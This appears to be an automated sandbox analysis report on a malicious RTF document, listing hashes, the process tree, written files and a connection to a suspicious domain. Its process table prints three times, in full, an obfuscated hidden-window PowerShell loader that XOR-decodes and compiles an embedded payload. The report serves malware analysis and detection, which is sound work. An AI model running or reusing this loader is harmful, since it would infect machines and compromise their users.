File name: | 39fd8035612444c36bd6a11ab6ff36c60acac65cc1ffe60cb4f7a6020253ecac.doc |
Full analysis: | https://app.any.run/tasks/1762d035-3de7-4a5a-9cef-7f5c3bdfce64 |
Verdict: | Malicious activity |
Analysis date: | August 26, 2019, 04:04:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 92AC2B428E09ED417D6E11A42887B695 |
SHA1: | 9817B4B635BE87E0CCE90B3011F4A775B1B63EBC |
SHA256: | 39FD8035612444C36BD6A11AB6FF36C60ACAC65CC1FFE60CB4F7A6020253ECAC |
SSDEEP: | 3072:oHghRNlzjmhRNlzjmhRNlzjmhRNlzjmhRNlzjRS:9RPzj6RPzj6RPzj6RPzj6RPzjRS |
.rtf | | | Rich Text Format (100) |
---|
Author: | Admin |
---|---|
LastModifiedBy: | Admin |
CreateDate: | 2019:01:07 23:54:00 |
ModifyDate: | 2019:01:07 23:54:00 |
RevisionNumber: | 1 |
TotalEditTime: | - |
Pages: | 1 |
Words: | - |
Characters: | 4 |
CharactersWithSpaces: | 4 |
InternalVersionNumber: | 57435 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3544 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\39fd8035612444c36bd6a11ab6ff36c60acac65cc1ffe60cb4f7a6020253ecac.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2520 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2400 | powershell -WindowStyle Hidden function me51579 { param($waf23) $sa72846 = 'k283f';$baeac74 = ''; for ($i = 0; $i -lt $waf23.length; $i+=2) { $he857 = [convert]::ToByte($waf23.Substring($i, 2), 16); $baeac74 += [char]($he857 -bxor $sa72846[($i / 2) % $sa72846.length]); } return $baeac74; } $t317c = '1e41515d014b614140120e5f034615025c5f133512414c560b45604d5d12025f5d1d2f05465d41091b615d411002515d405d1e41515d014b614140120e5f16770f0a55565c151f5b5b405d1e41515d014b614140120e5f167a2950474b5a080c126b4a151f57551d280e46033e6c1b475a5f0f08125b5f07184118455f53015a501d3076545f2f064257411243105356140557540054491e7d5d12194b685c0f05460511210e4668410908735c57140e414b114f3612484604075b5b13151f534c5a054b57404703195c187a081f624c414618575e05040d1a715d123b464a1312535409015347414c410f05551855030a0a011a5d3076545f2f064257411243105356140557540054491e1876081f40416309025c4c135b4b10745c070f7e5151140a4041114f3612484604075b5b13151f534c5a054b57404703195c187a081f624c414618015b555e520a104012195b5654460f030c0202420963770a077b554309194610110d0e4056560a58001a1f462e5c4c411f3b5d515d1256106e5a141f47595f36195d4c56051f10116e461b475a5f0f08124b47071f5b5b130313465d41084b50575c0a4b580a055e0854107a081f624c41460d070e52514767715d123b464a130752075e024a4b47515d124b57590b5e53000e1f4604474c1313025c4c131c5d570056070a1b036822075e715e1604404c1b4420574a5d0307010a1d02075e1a1f462e5c4c411f3b5d515d1256106a470a265d4e562b0e5f57411f491e1860031f7e5940122e404a5c145654595f150e1b6513151f534c5a054b57404703195c18450902561857055e04010b4e225c4c631219124e51525301001f2f05466847144b570f0b550d1e515d124b550a045e5350011a5d1b475a5f0f08124b47071f5b5b130f05461851070a0309564e4249715d123b464a13040e040e57555f1205131558515e0b5f531a5556535a070f0a4e49025906005f500d525253025e06035e061a1a4f505b5e1b040e040e57555f0f057a081f624c414831574a5c4f10555747094b575a55020f505d081b225c4c6312191248500252030e525b18575e05040d1a5a56505d560b074a06570d02535c0b1011540a075e07045e530b065653070b06505c030900560f070c06025f031a1a4f505b5e1b1608560102500a0f057a081f624c414831574a5c4f10555747094b575a55020f505d081b3e7b5647361f4018555508065e565b4367715d123b464a1a535047515d124b5e000651520305035d025410120c590400500043425b575f5a04591f0058510c55034702400756475d4d4746070a0d045f5a1b114801044657130309545c57040e0945711f1f57636e460e0301025e5649084b555a1e084b000d1e084b5f5b4f037a081f624c41461b040a075e5c0f755214185a595f482a5e545c052375545c040a5e10004f507f5941150353541d250442411b035a0b090b4a5b1e4805545f0a0f1f5542095c50535d0b001b080e45187a081f624c414e1b515c0a575d53166709225c4c0552431b13031e5b0209514f47420e0152530514004f50575a55020f505d09463c575a700a02575647461b060057500d05055d031c126f5604285e5156081f1a1108151f40515d014b515901540e510576081d5b4a5c0806575647482c574c750907565d41360a46501b230544514109055f5d5d124561485605025354750907565d41482a42485f0f08534c5a09057659470742191a6f3a0c005d040453001a180b0e07090651521a1a07535e050c03535d101108165f0a5c05005c1c7c5c11055e5752022d5b54564e06570d02535c0b10115658060e07055f010906535a035c02515e0708555758060906565e53080b560e075d06525e020c0b5653075c06535a510d045608050804035e530955565d060b03045b050907540d065905025e510c0b560e06590602491b14500759005d504f50624a5c050e414b60120a404c7a080d5d1854020f055a505b05574f1336195d5b561518614c52141f7b56550943515901540e51110836195d5b5615181c6b470719461054020f055a504f50405d4713195c18035d16424d510a02511840120a4651504618464a5a080c125556535a070f0a4e18464a5a080c12400a5e0d011148151f40515d014b46005557590705110d590a0b554450414c410f05551840550854000a5e56614c410f055516760b1b464108000440105a081f12510e56505b044b5f53540b1d2a0e5c5f470e505b130e5442495a4a120e124b56005d505e0e25045c4e56141f1c6c5c2412465d1b1e520a5e004838475a4012195b56544e021e0a1a4a5a0411081558515e0b5f5319051b0503534a1a4e18575e05040d126613125354090153301a511c5442121d13125354090153457e5d5d011f5a651a5d16405d4713195c1840550854000a5e504f45'; $t317c2 = me51579($t317c); Add-Type -TypeDefinition $t317c2; [v983bc]::baa11e(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3928 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2268 | powershell -WindowStyle Hidden function me51579 { param($waf23) $sa72846 = 'k283f';$baeac74 = ''; for ($i = 0; $i -lt $waf23.length; $i+=2) { $he857 = [convert]::ToByte($waf23.Substring($i, 2), 16); $baeac74 += [char]($he857 -bxor $sa72846[($i / 2) % $sa72846.length]); } return $baeac74; } $t317c = '1e41515d014b614140120e5f034615025c5f133512414c560b45604d5d12025f5d1d2f05465d41091b615d411002515d405d1e41515d014b614140120e5f16770f0a55565c151f5b5b405d1e41515d014b614140120e5f167a2950474b5a080c126b4a151f57551d280e46033e6c1b475a5f0f08125b5f07184118455f53015a501d3076545f2f064257411243105356140557540054491e7d5d12194b685c0f05460511210e4668410908735c57140e414b114f3612484604075b5b13151f534c5a054b57404703195c187a081f624c414618575e05040d1a715d123b464a1312535409015347414c410f05551855030a0a011a5d3076545f2f064257411243105356140557540054491e1876081f40416309025c4c135b4b10745c070f7e5151140a4041114f3612484604075b5b13151f534c5a054b57404703195c187a081f624c414618015b555e520a104012195b5654460f030c0202420963770a077b554309194610110d0e4056560a58001a1f462e5c4c411f3b5d515d1256106e5a141f47595f36195d4c56051f10116e461b475a5f0f08124b47071f5b5b130313465d41084b50575c0a4b580a055e0854107a081f624c41460d070e52514767715d123b464a130752075e024a4b47515d124b57590b5e53000e1f4604474c1313025c4c131c5d570056070a1b036822075e715e1604404c1b4420574a5d0307010a1d02075e1a1f462e5c4c411f3b5d515d1256106a470a265d4e562b0e5f57411f491e1860031f7e5940122e404a5c145654595f150e1b6513151f534c5a054b57404703195c18450902561857055e04010b4e225c4c631219124e51525301001f2f05466847144b570f0b550d1e515d124b550a045e5350011a5d1b475a5f0f08124b47071f5b5b130f05461851070a0309564e4249715d123b464a13040e040e57555f1205131558515e0b5f531a5556535a070f0a4e49025906005f500d525253025e06035e061a1a4f505b5e1b040e040e57555f0f057a081f624c414831574a5c4f10555747094b575a55020f505d081b225c4c6312191248500252030e525b18575e05040d1a5a56505d560b074a06570d02535c0b1011540a075e07045e530b065653070b06505c030900560f070c06025f031a1a4f505b5e1b1608560102500a0f057a081f624c414831574a5c4f10555747094b575a55020f505d081b3e7b5647361f4018555508065e565b4367715d123b464a1a535047515d124b5e000651520305035d025410120c590400500043425b575f5a04591f0058510c55034702400756475d4d4746070a0d045f5a1b114801044657130309545c57040e0945711f1f57636e460e0301025e5649084b555a1e084b000d1e084b5f5b4f037a081f624c41461b040a075e5c0f755214185a595f482a5e545c052375545c040a5e10004f507f5941150353541d250442411b035a0b090b4a5b1e4805545f0a0f1f5542095c50535d0b001b080e45187a081f624c414e1b515c0a575d53166709225c4c0552431b13031e5b0209514f47420e0152530514004f50575a55020f505d09463c575a700a02575647461b060057500d05055d031c126f5604285e5156081f1a1108151f40515d014b515901540e510576081d5b4a5c0806575647482c574c750907565d41360a46501b230544514109055f5d5d124561485605025354750907565d41482a42485f0f08534c5a09057659470742191a6f3a0c005d040453001a180b0e07090651521a1a07535e050c03535d101108165f0a5c05005c1c7c5c11055e5752022d5b54564e06570d02535c0b10115658060e07055f010906535a035c02515e0708555758060906565e53080b560e075d06525e020c0b5653075c06535a510d045608050804035e530955565d060b03045b050907540d065905025e510c0b560e06590602491b14500759005d504f50624a5c050e414b60120a404c7a080d5d1854020f055a505b05574f1336195d5b561518614c52141f7b56550943515901540e51110836195d5b5615181c6b470719461054020f055a504f50405d4713195c18035d16424d510a02511840120a4651504618464a5a080c125556535a070f0a4e18464a5a080c12400a5e0d011148151f40515d014b46005557590705110d590a0b554450414c410f05551840550854000a5e56614c410f055516760b1b464108000440105a081f12510e56505b044b5f53540b1d2a0e5c5f470e505b130e5442495a4a120e124b56005d505e0e25045c4e56141f1c6c5c2412465d1b1e520a5e004838475a4012195b56544e021e0a1a4a5a0411081558515e0b5f5319051b0503534a1a4e18575e05040d126613125354090153301a511c5442121d13125354090153457e5d5d011f5a651a5d16405d4713195c1840550854000a5e504f45'; $t317c2 = me51579($t317c); Add-Type -TypeDefinition $t317c2; [v983bc]::baa11e(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2392 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\zmtnevhr.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3280 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2264 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESAF70.tmp" "c:\Users\admin\AppData\Local\Temp\CSCAF6F.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
3708 | powershell -WindowStyle Hidden function me51579 { param($waf23) $sa72846 = 'k283f';$baeac74 = ''; for ($i = 0; $i -lt $waf23.length; $i+=2) { $he857 = [convert]::ToByte($waf23.Substring($i, 2), 16); $baeac74 += [char]($he857 -bxor $sa72846[($i / 2) % $sa72846.length]); } return $baeac74; } $t317c = '1e41515d014b614140120e5f034615025c5f133512414c560b45604d5d12025f5d1d2f05465d41091b615d411002515d405d1e41515d014b614140120e5f16770f0a55565c151f5b5b405d1e41515d014b614140120e5f167a2950474b5a080c126b4a151f57551d280e46033e6c1b475a5f0f08125b5f07184118455f53015a501d3076545f2f064257411243105356140557540054491e7d5d12194b685c0f05460511210e4668410908735c57140e414b114f3612484604075b5b13151f534c5a054b57404703195c187a081f624c414618575e05040d1a715d123b464a1312535409015347414c410f05551855030a0a011a5d3076545f2f064257411243105356140557540054491e1876081f40416309025c4c135b4b10745c070f7e5151140a4041114f3612484604075b5b13151f534c5a054b57404703195c187a081f624c414618015b555e520a104012195b5654460f030c0202420963770a077b554309194610110d0e4056560a58001a1f462e5c4c411f3b5d515d1256106e5a141f47595f36195d4c56051f10116e461b475a5f0f08124b47071f5b5b130313465d41084b50575c0a4b580a055e0854107a081f624c41460d070e52514767715d123b464a130752075e024a4b47515d124b57590b5e53000e1f4604474c1313025c4c131c5d570056070a1b036822075e715e1604404c1b4420574a5d0307010a1d02075e1a1f462e5c4c411f3b5d515d1256106a470a265d4e562b0e5f57411f491e1860031f7e5940122e404a5c145654595f150e1b6513151f534c5a054b57404703195c18450902561857055e04010b4e225c4c631219124e51525301001f2f05466847144b570f0b550d1e515d124b550a045e5350011a5d1b475a5f0f08124b47071f5b5b130f05461851070a0309564e4249715d123b464a13040e040e57555f1205131558515e0b5f531a5556535a070f0a4e49025906005f500d525253025e06035e061a1a4f505b5e1b040e040e57555f0f057a081f624c414831574a5c4f10555747094b575a55020f505d081b225c4c6312191248500252030e525b18575e05040d1a5a56505d560b074a06570d02535c0b1011540a075e07045e530b065653070b06505c030900560f070c06025f031a1a4f505b5e1b1608560102500a0f057a081f624c414831574a5c4f10555747094b575a55020f505d081b3e7b5647361f4018555508065e565b4367715d123b464a1a535047515d124b5e000651520305035d025410120c590400500043425b575f5a04591f0058510c55034702400756475d4d4746070a0d045f5a1b114801044657130309545c57040e0945711f1f57636e460e0301025e5649084b555a1e084b000d1e084b5f5b4f037a081f624c41461b040a075e5c0f755214185a595f482a5e545c052375545c040a5e10004f507f5941150353541d250442411b035a0b090b4a5b1e4805545f0a0f1f5542095c50535d0b001b080e45187a081f624c414e1b515c0a575d53166709225c4c0552431b13031e5b0209514f47420e0152530514004f50575a55020f505d09463c575a700a02575647461b060057500d05055d031c126f5604285e5156081f1a1108151f40515d014b515901540e510576081d5b4a5c0806575647482c574c750907565d41360a46501b230544514109055f5d5d124561485605025354750907565d41482a42485f0f08534c5a09057659470742191a6f3a0c005d040453001a180b0e07090651521a1a07535e050c03535d101108165f0a5c05005c1c7c5c11055e5752022d5b54564e06570d02535c0b10115658060e07055f010906535a035c02515e0708555758060906565e53080b560e075d06525e020c0b5653075c06535a510d045608050804035e530955565d060b03045b050907540d065905025e510c0b560e06590602491b14500759005d504f50624a5c050e414b60120a404c7a080d5d1854020f055a505b05574f1336195d5b561518614c52141f7b56550943515901540e51110836195d5b5615181c6b470719461054020f055a504f50405d4713195c18035d16424d510a02511840120a4651504618464a5a080c125556535a070f0a4e18464a5a080c12400a5e0d011148151f40515d014b46005557590705110d590a0b554450414c410f05551840550854000a5e56614c410f055516760b1b464108000440105a081f12510e56505b044b5f53540b1d2a0e5c5f470e505b130e5442495a4a120e124b56005d505e0e25045c4e56141f1c6c5c2412465d1b1e520a5e004838475a4012195b56544e021e0a1a4a5a0411081558515e0b5f5319051b0503534a1a4e18575e05040d126613125354090153301a511c5442121d13125354090153457e5d5d011f5a651a5d16405d4713195c1840550854000a5e504f45'; $t317c2 = me51579($t317c); Add-Type -TypeDefinition $t317c2; [v983bc]::baa11e(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2688 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9C73.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2520 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA4A1.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3928 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRAB77.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2400 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q77E59K726ZWMIUZBPK4.temp | — | |
MD5:— | SHA256:— | |||
3280 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRAEC3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2264 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESAF70.tmp | — | |
MD5:— | SHA256:— | |||
2392 | csc.exe | C:\Users\admin\AppData\Local\Temp\zmtnevhr.dll | — | |
MD5:— | SHA256:— | |||
2268 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NGTGTBAFI5SRU36OWHHQ.temp | — | |
MD5:— | SHA256:— | |||
2392 | csc.exe | C:\Users\admin\AppData\Local\Temp\zmtnevhr.out | — | |
MD5:— | SHA256:— | |||
2688 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRB28C.tmp.cvr | — | |
MD5:— | SHA256:— |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2400 | powershell.exe | 50.87.151.158:443 | fixshinellc.com | Unified Layer | US | suspicious |
Domain | IP | Reputation |
---|---|---|
fixshinellc.com |
| suspicious |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|